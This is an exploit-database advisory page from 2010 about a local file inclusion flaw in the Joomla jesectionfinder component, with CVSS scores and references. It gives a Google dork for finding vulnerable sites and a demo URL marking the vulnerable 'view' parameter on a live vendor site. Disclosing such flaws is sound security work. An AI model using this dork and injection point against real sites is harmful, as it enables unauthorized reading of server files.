Joomla jesectionfinder LFI Vulnerability

2010.07.13
Credit: Sid3^effects
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

================================================ Joomla jesectionfinder LFI Vulnerability ================================================ 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ########################################## 1 0 I'm Sid3^effects member from Inj3ct0r Team 1 1 ########################################## 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Name : Joomla jesectionfinder LFI Vulnerability Date : june, 26 2010 Critical Level : HIGH Vendor Url : http://joomlaextensions.co.in/component/awd_song/ Google Dork: inurl:/component/jesectionfinder/ Price:$25.00 Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com> special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_ greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz ####################################################################################################### Description: This component for web-based business that specialises in buying and selling sections nationwide. Our aim is easy to connect the seller of land directly to the buyer, its simple. Easy to handle that component functionallity. User can add your section/property into particular listing option. Listing option manages from the backend. User selects his plan (Listing option) and enters property detail (with images). After use see that preview and make it payment. If user makes it payment successfully than it display automating otherwise his listing not published. User searches property and contact seller for more detail. ####################################################################################################### Xploit:jesectionfinder LFI DEMO URL : http://joomlaextensions.co.in/propertyfinder/component/jesectionfinder/?view=[LFI] ############################################################################################################### # 0day no more # Sid3^effects

References:

http://xforce.iss.net/xforce/xfdb/59796
http://www.securityfocus.com/bid/41163
http://www.exploit-db.com/exploits/14064
http://packetstormsecurity.org/1006-exploits/joomlajesectionfinder-lfi.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top